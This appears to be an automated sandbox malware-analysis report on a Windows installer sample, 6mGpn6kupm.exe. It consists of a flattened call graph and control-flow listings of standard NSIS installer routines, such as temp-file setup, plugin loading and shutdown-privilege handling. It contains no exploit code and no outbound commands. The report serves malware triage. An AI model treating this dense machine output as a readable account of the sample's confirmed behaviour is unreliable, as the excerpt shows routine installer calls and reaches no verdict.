calls 4640->4641 4642 403aec 4641->4642 4643 403af2 4642->4643 4644 403b04 4642->4644 4734 40632f wsprintfW 4643->4734 4645 4062b6 3 API calls 4644->4645 4646 403b34 4645->4646 4647 403b53 lstrcatW 4646->4647 4649 4062b6 3 API calls 4646->4649 4650 403b02 4647->4650 4649->4647 4726 403dae 4650->4726 4653 405dc5 18 API calls 4655 403b85 4653->4655 4654 403c19 4656 405dc5 18 API calls 4654->4656 4655->4654 4657 4062b6 3 API calls 4655->4657 4658 403c1f 4656->4658 4659 403bb7 4657->4659 4660 403c2f LoadImageW 4658->4660 4663 40640a 17 API calls 4658->4663 4659->4654 4666 403bd8 lstrlenW 4659->4666 4670 405cea CharNextW 4659->4670 4661 403cd5 4660->4661 4662 403c56 RegisterClassW 4660->4662 4665 40140b 2 API calls 4661->4665 4664 403c8c SystemParametersInfoW CreateWindowExW 4662->4664 4695 403cdf 4662->4695 4663->4660 4664->4661 4669 403cdb 4665->4669 4667 403be6 lstrcmpiW 4666->4667 4668 403c0c 4666->4668 4667->4668 4671 403bf6 GetFileAttributesW 4667->4671 4672 405cbd 3 API calls 4668->4672 4675 403dae 18 API calls 4669->4675 4669->4695 4673 403bd5 4670->4673 4674 403c02 4671->4674 4676 403c12 4672->4676 4673->4666 4674->4668 4677 405d09 2 API calls 4674->4677 4678 403cec 4675->4678 4735 4063e8 lstrcpynW 4676->4735 4677->4668 4680 403cf8 ShowWindow 4678->4680 4681 403d7b 4678->4681 4683 406752 3 API calls 4680->4683 4736 405523 OleInitialize 4681->4736 4685 403d10 4683->4685 4684 403d81 4686 403d85 4684->4686 4687 403d9d 4684->4687 4688 403d1e GetClassInfoW 4685->4688 4690 406752 3 API calls 4685->4690 4694 40140b 2 API calls 4686->4694 4686->4695 4689 40140b 2 API calls 4687->4689 4691 403d32 GetClassInfoW RegisterClassW 4688->4691 4692 403d48 DialogBoxParamW 4688->4692 4689->4695 4690->4688 4691->4692 4693 40140b 2 API calls 4692->4693 4693->4695 4694->4695 4695->4593 4696->4543 4697->4575 4698->4544 4700 403a01 4699->4700 4701 4039f7 CloseHandle 4699->4701 4702 403a15 4700->4702 4703 403a0b CloseHandle 4700->4703 4701->4700 4747 403a43 4702->4747 4703->4702 4706 405afa 67 API calls 4707 403819 OleUninitialize 4706->4707 4707->4550 4707->4551 4709 405a63 4708->4709 4710 405a77 MessageBoxIndirectW 4709->4710 4711 403838 ExitProcess 4709->4711 4710->4711 4712->4583 4713->4595 4715 405a10 4714->4715 4716 405a04 CloseHandle 4714->4716 4715->4595 4716->4715 4718 405f1a GetTickCount GetTempFileNameW 4717->4718 4719 405f50 4718->4719 4720 4034a3 4718->4720 4719->4718 4719->4720 4720->4530 4721->4612 4722->4614 4723->4618 4724->4636 4725->4628 4727 403dc2 4726->4727 4743 40632f wsprintfW 4727->4743 4729 403e33 4744 403e67 4729->4744 4731 403b63 4731->4653 4732 403e38 4732->4731 4733 40640a 17 API calls 4732->4733 4733->4732 4734->4650 4735->4654 4737 4043ab SendMessageW 4736->4737 4738 405546 4737->4738 4741 40556d 4738->4741 4742 401389 2 API calls 4738->4742 4739 4043ab SendMessageW 4740 40557f OleUninitialize 4739->4740 4740->4684 4741->4739 4742->4738 4743->4729 4745 40640a 17 API calls 4744->4745 4746 403e75 SetWindowTextW 4745->4746 4746->4732 4748 403a51 4747->4748 4749 403a56 FreeLibrary GlobalFree 4748->4749 4750 403a1a 4748->4750 4749->4749 4749->4750 4750->4706 5868 404ba6 5869 404bd2 5868->5869 5870 404bb6 5868->5870 5872 404c05 5869->5872 5873 404bd8 SHGetPathFromIDListW 5869->5873 5879 405a32 GetDlgItemTextW 5870->5879 5874 404bef SendMessageW 5873->5874 5875 404be8 5873->5875 5874->5872 5877 40140b 2 API calls 5875->5877 5876 404bc3 SendMessageW 5876->5869 5877->5874 5879->5876 5901 401a30 5902 402c41 17 API calls 5901->5902 5903 401a39 ExpandEnvironmentStringsW 5902->5903 5904 401a60 5903->5904 5905 401a4d 5903->5905 5905->5904 5906 401a52 lstrcmpW 5905->5906 5906->5904 5907 701c166d 5908 701c1516 GlobalFree 5907->5908 5911 701c1685 5908->5911 5909 701c16cb GlobalFree 5910 701c16a0 5910->5909 5911->5909 5911->5910 5912 701c16b7 VirtualFree 5911->5912 5912->5909 5030 402032 5031 402044 5030->5031 5041 4020f6 5030->5041 5032 402c41 17 API calls 5031->5032 5034 40204b 5032->5034 5033 401423 24 API calls 5036 402250 5033->5036 5035 402c41 17 API calls 5034->5035 5037 402054 5035->5037 5038 40206a LoadLibraryExW 5037->5038 5039 40205c GetModuleHandleW 5037->5039 5040 40207b 5038->5040 5038->5041 5039->5038 5039->5040 5053 406831 WideCharToMultiByte 5040->5053 5041->5033 5044 4020c5 5046 405450 24 API calls 5044->5046 5045 40208c 5047 402094 5045->5047 5048 4020ab 5045->5048 5049 40209c 5046->5049 5050 401423 24 API calls 5047->5050 5056 701c1777 5048->5056 5049->5036 5051 4020e8 FreeLibrary 5049->5051 5050->5049 5051->5036 5054 40685b GetProcAddress 5053->5054 5055 402086 5053->5055 5054->5055 5055->5044 5055->5045 5057 701c17aa 5056->5057 5098 701c1b5f 5057->5098 5059 701c17b1 5060 701c18d6 5059->5060 5061 701c17c9 5059->5061 5062 701c17c2 5059->5062 5060->5049 5132 701c2394 5061->5132 5148 701c2352 5062->5148 5067 701c182d 5073 701c187e 5067->5073 5074 701c1833 5067->5074 5068 701c180f 5161 701c2569 5068->5161 5069 701c17df 5072 701c17e5 5069->5072 5076 701c17f0 5069->5076 5070 701c17f8 5082 701c17ee 5070->5082 5158 701c2d37 5070->5158 5072->5082 5142 701c2aac 5072->5142 5080 701c2569 10 API calls 5073->5080 5180 701c15c6 5074->5180 5075 701c1815 5172 701c15b4 5075->5172 5152 701c2724 5076->5152 5085 701c186f 5080->5085 5082->5067 5082->5068 5089 701c18c5 5085->5089 5186 701c252c 5085->5186 5087 701c17f6 5087->5082 5088 701c2569 10 API calls 5088->5085 5089->5060 5093 701c18cf GlobalFree 5089->5093 5093->5060 5095 701c18b1 5095->5089 5190 701c153d wsprintfW 5095->5190 5096 701c18aa FreeLibrary 5096->5095 5193 701c121b GlobalAlloc 5098->5193 5100 701c1b83 5194 701c121b GlobalAlloc 5100->5194 5102 701c1da9 GlobalFree GlobalFree GlobalFree 5103 701c1dc6 5102->5103 5116 701c1e10 5102->5116 5105 701c2192 5103->5105 5113 701c1ddb 5103->5113 5103->5116 5104 701c1c64 GlobalAlloc 5127 701c1b8e 5104->5127 5106 701c21b4 GetModuleHandleW 5105->5106 5105->5116 5109 701c21da 5106->5109 5110 701c21c5 LoadLibraryW 5106->5110 5107 701c1caf lstrcpyW 5112 701c1cb9 lstrcpyW 5107->5112 5108 701c1ccd GlobalFree 5108->5127 5201 701c161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5109->5201 5110->5109 5110->5116 5112->5127 5113->5116 5197 701c122c 5113->5197 5114 701c222c 5114->5116 5118 701c2239 lstrlenW 5114->5118 5115 701c20ec 5115->5116 5125 701c2134 lstrcpyW 5115->5125 5116->5059 5202 701c161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5118->5202 5119 701c2064 5200 701c121b GlobalAlloc 5119->5200 5120 701c21ec 5120->5114 5130 701c2216 GetProcAddress 5120->5130 5123 701c1d0b 5123->5127 5195 701c158f GlobalSize GlobalAlloc 5123->5195 5124 701c1fa5 GlobalFree 5124->5127 5125->5116 5126 701c2253 5126->5116 5127->5102 5127->5104 5127->5107 5127->5108 5127->5112 5127->5115 5127->5116 5127->5119 5127->5123 5127->5124 5128 701c122c 2 API calls 5127->5128 5128->5127 5130->5114 5131 701c206d 5131->5059 5134 701c23ac 5132->5134 5133 701c122c GlobalAlloc lstrcpynW 5133->5134 5134->5133 5136 701c24d5 GlobalFree 5134->5136 5138 701c247f GlobalAlloc CLSIDFromString 5134->5138 5139 701c2454 GlobalAlloc WideCharToMultiByte 5134->5139 5141 701c249e 5134->5141 5204 701c12ba 5134->5204 5136->5134 5137 701c17cf 5136->5137 5137->5069 5137->5070 5137->5082 5138->5136 5139->5136 5141->5136 5208 701c26b8 5141->5208 5143 701c2abe 5142->5143 5144 701c2b63 EnumWindows 5143->5144 5145 701c2b81 5144->5145 5211 701c2a56 5145->5211 5147 701c2c4d 5147->5082 5149 701c2367 5148->5149 5150 701c2372 GlobalAlloc 5149->5150 5151 701c17c8 5149->5151 5150->5149 5151->5061 5156 701c2754 5152->5156 5153 701c27ef GlobalAlloc 5157 701c2812 5153->5157 5154 701c2802 5155 701c2808 GlobalSize 5154->5155 5154->5157 5155->5157 5156->5153 5156->5154 5157->5087 5159 701c2d42 5158->5159 5160 701c2d82 GlobalFree 5159->5160 5215 701c121b GlobalAlloc 5161->5215 5163 701c25ec MultiByteToWideChar 5168 701c2573 5163->5168 5164 701c260e StringFromGUID2 5164->5168 5165 701c261f lstrcpynW 5165->5168 5166 701c2632 wsprintfW 5166->5168 5167 701c2656 GlobalFree 5167->5168 5168->5163 5168->5164 5168->5165 5168->5166 5168->5167 5169 701c268b GlobalFree 5168->5169 5170 701c1272 2 API calls 5168->5170 5216 701c12e1 5168->5216 5169->5075 5170->5168 5220 701c121b GlobalAlloc 5172->5220 5174 701c15b9 5175 701c15c6 2 API calls 5174->5175 5176 701c15c3 5175->5176 5177 701c1272 5176->5177 5178 701c127b GlobalAlloc lstrcpynW 5177->5178 5179 701c12b5 GlobalFree 5177->5179 5178->5179 5179->5085 5181 701c15ff lstrcpyW 5180->5181 5182 701c15d2 wsprintfW 5180->5182 5185 701c1618 5181->5185 5182->5185 5185->5088 5187 701c253a 5186->5187 5189 701c1891 5186->5189 5188 701c2556 GlobalFree 5187->5188 5187->5189 5188->5187 5189->5095 5189->5096 5191 701c1272 2 API calls 5190->5191 5192 701c155e 5191->5192 5192->5089 5193->5100 5194->5127 5196 701c15ad 5195->5196 5196->5123 5203 701c121b GlobalAlloc 5197->5203 5199 701c123b lstrcpynW 5199->5116 5200->5131 5201->5120 5202->5126 5203->5199 5205 701c12c1 5204->5205 5206 701c122c 2 API calls 5205->5206 5207 701c12df 5206->5207 5207->5134 5209 701c271c 5208->5209 5210 701c26c6 VirtualAlloc 5208->5210 5209->5141 5210->5209 5212 701c2a61 5211->5212 5213 701c2a66 GetLastError 5212->5213 5214 701c2a71 5212->5214 5213->5214 5214->5147 5215->5168 5217 701c130c 5216->5217 5218 701c12ea 5216->5218 5217->5168 5218->5217 5219 701c12f0 lstrcpyW 5218->5219 5219->5217 5220->5174 5918 402a35 5919 402c1f 17 API calls 5918->5919 5920 402a3b 5919->5920 5921 402a72 5920->5921 5922 40288b 5920->5922 5924 402a4d 5920->5924 5921->5922 5923 40640a 17 API calls 5921->5923 5923->5922 5924->5922 5926 40632f wsprintfW 5924->5926 5926->5922 5927 401735 5928 402c41 17 API calls 5927->5928 5929 40173c SearchPathW 5928->5929 5930 4029e6 5929->5930 5931 401757 5929->5931 5931->5930 5933 4063e8 lstrcpynW 5931->5933 5933->5930 5934 4014b8 5935 4014be 5934->5935 5936 401389 2 API calls 5935->5936 5937 4014c6 5936->5937 5938 401db9 GetDC 5939 402c1f 17 API calls 5938->5939 5940 401dcb GetDeviceCaps MulDiv ReleaseDC 5939->5940 5941 402c1f 17 API calls 5940->5941 5942 401dfc 5941->5942 5943 40640a 17 API calls 5942->5943 5944 401e39 CreateFontIndirectW 5943->5944 5945 402592 5944->5945 5946 40283b 5947 402843 5946->5947 5948 402847 FindNextFileW 5947->5948 5949 402859 5947->5949 5948->5949 5950 4029e6 5949->5950 5952 4063e8 lstrcpynW 5949->5952 5952->5950 5953 701c10e1 5962 701c1111 5953->5962 5954 701c11d8 GlobalFree 5955 701c12ba 2 API calls 5955->5962 5956 701c11d3 5956->5954 5957 701c1164 GlobalAlloc 5957->5962 5958 701c11f8 GlobalFree 5958->5962 5959 701c1272 2 API calls 5960 701c11c4 GlobalFree 5959->5960 5960->5962 5961 701c12e1 lstrcpyW 5961->5962 5962->5954 5962->5955 5962->5956 5962->5957 5962->5958 5962->5959 5962->5960 5962->5961 5970 402abe InvalidateRect 5971 402ac5 5970->5971

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 8 4034ee 1->8 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 8->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 36 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->36 37 403749-403763 DeleteFileW call 402f30 29->37 34 4035e0-4035e4 30->34 35 4035db-4035df 30->35 31->30 31->31 38 4036a3-4036b0 call 405cea 34->38 39 4035ea-4035f0 34->39 35->34 36->37 53 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 36->53 57 403814-403824 call 4039e6 OleUninitialize 37->57 58 403769-40376f 37->58 55 4036b2-4036b3 38->55 56 4036b4-4036ba 38->56 43 4035f2-4035fa 39->43 44 40360b-403644 39->44 48 403601 43->48 49 4035fc-4035ff 43->49 50 403661-40369b 44->50 51 403646-40364b 44->51 48->44 49->44 49->48 50->38 54 40369d-4036a1 50->54 51->50 52 40364d-403655 51->52 60 403657-40365a 52->60 61 40365c 52->61 53->37 53->57 54->38 63 4036c2-4036d0 call 4063e8 54->63 55->56 56->28 64 4036c0 56->64 73 40394a-403950 57->73 74 40382a-40383a call 405a4e ExitProcess 57->74 65 403804-40380b call 403ad8 58->65 66 403775-403780 call 405cea 58->66 60->50 60->61 61->50 69 4036d5 63->69 64->69 76 403810 65->76 80 403782-4037b7 66->80 81 4037ce-4037d8 66->81 69->29 78 403952-403968 GetCurrentProcess OpenProcessToken 73->78 79 4039ce-4039d6 73->79 76->57 87 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 78->87 88 40399e-4039ac call 4067c2 78->88 82 4039d8 79->82 83 4039dc-4039e0 ExitProcess 79->83 89 4037b9-4037bd 80->89 85 403840-403854 call 4059b9 lstrcatW 81->85 86 4037da-4037e8 call 405dc5 81->86 82->83 100 403861-40387b lstrcatW lstrcmpiW 85->100 101 403856-40385c lstrcatW 85->101 86->57 99 4037ea-403800 call 4063e8 * 2 86->99 87->88 102 4039ba-4039c5 ExitWindowsEx 88->102 103 4039ae-4039b8 88->103 90 4037c6-4037ca 89->90 91 4037bf-4037c4 89->91 90->89 95 4037cc 90->95 91->90 91->95 95->81 99->65 100->57 106 40387d-403880 100->106 101->100 102->79 104 4039c7-4039c9 call 40140b 102->104 103->102 103->104 104->79 109 403882-403887 call 40591f 106->109 110 403889 call 40599c 106->110 115 40388e-40389c SetCurrentDirectoryW 109->115 110->115 118 4038a9-4038d2 call 4063e8 115->118 119 40389e-4038a4 call 4063e8 115->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 128 40393e-403945 call 4061ae 126->128 127->126 129 403907-403927 call 4061ae call 40640a call 4059d1 127->129 128->57 129->126 138 403929-403930 CloseHandle 129->138 138->126
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\6mGpn6kupm.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                              • String ID: .tmp$1033$C:\Users\user\AppData\Local\Iw\Bargains$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\6mGpn6kupm.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3441113951-3627803890
                                                                                                              • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                              • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 162 4051c7-4051cf 152->162 163 405158-40515e 152->163 153->154 154->151 159 405089-40508c 155->159 160 4050fc-4050ff 155->160 156->152 156->155 195 404f33-404f39 157->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 157->196 168 405097-4050ac call 404d1a 159->168 169 40508e-405095 159->169 160->152 164 405101-40510b 160->164 166 4051d1-4051d7 SendMessageW 162->166 167 4051d9-4051e0 162->167 171 405164-40516e 163->171 172 4053af-4053c1 call 4043c6 163->172 174 40511b-405125 164->174 175 40510d-405119 SendMessageW 164->175 166->167 176 4051e2-4051e9 167->176 177 405214-40521b 167->177 168->160 194 4050ae-4050bf 168->194 169->160 169->168 171->172 180 405174-405183 SendMessageW 171->180 174->152 182 405127-405131 174->182 175->174 183 4051f2-4051f9 176->183 184 4051eb-4051ec ImageList_Destroy 176->184 187 405371-405378 177->187 188 405221-40522d call 4011ef 177->188 180->172 189 405189-40519a SendMessageW 180->189 190 405142-40514c 182->190 191 405133-405140 182->191 192 405202-40520e 183->192 193 4051fb-4051fc GlobalFree 183->193 184->183 187->172 200 40537a-405381 187->200 214 40523d-405240 188->214 215 40522f-405232 188->215 198 4051a4-4051a6 189->198 199 40519c-4051a2 189->199 190->152 191->152 192->177 193->192 194->160 203 4050c1-4050c3 194->203 204 404f3c-404f43 195->204 202 405011-405015 196->202 206 4051a7-4051c0 call 401299 SendMessageW 198->206 199->198 199->206 200->172 201 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->201 201->172 208 405017-40502a ShowWindow call 404394 202->208 209 40502f-405037 call 404394 202->209 210 4050c5-4050cc 203->210 211 4050d6 203->211 212 404fd9-404fec 204->212 213 404f49-404f71 204->213 206->162 208->172 209->140 222 4050d2-4050d4 210->222 223 4050ce-4050d0 210->223 226 4050d9-4050f5 call 40117d 211->226 212->204 217 404ff2-404ff6 212->217 224 404f73-404fa9 SendMessageW 213->224 225 404fab-404fad 213->225 218 405281-4052a5 call 4011ef 214->218 219 405242-40525b call 4012e2 call 401299 214->219 227 405234 215->227 228 405235-405238 call 404d9a 215->228 217->196 217->202 241 405347-40535b InvalidateRect 218->241 242 4052ab 218->242 249 40526b-40527a SendMessageW 219->249 250 40525d-405263 219->250 222->226 223->226 224->212 229 404fc0-404fd6 SendMessageW 225->229 230 404faf-404fbe SendMessageW 225->230 226->160 227->228 228->214 229->212 230->212 241->187 245 40535d-40536c call 404ced call 404cd5 241->245 243 4052ae-4052b9 242->243 246 4052bb-4052ca 243->246 247 40532f-405341 243->247 245->187 251 4052cc-4052d9 246->251 252 4052dd-4052e0 246->252 247->241 247->243 249->218 253 405265 250->253 254 405266-405269 250->254 251->252 256 4052e2-4052e5 252->256 257 4052e7-4052f0 252->257 253->254 254->249 254->250 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->247 260->259
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
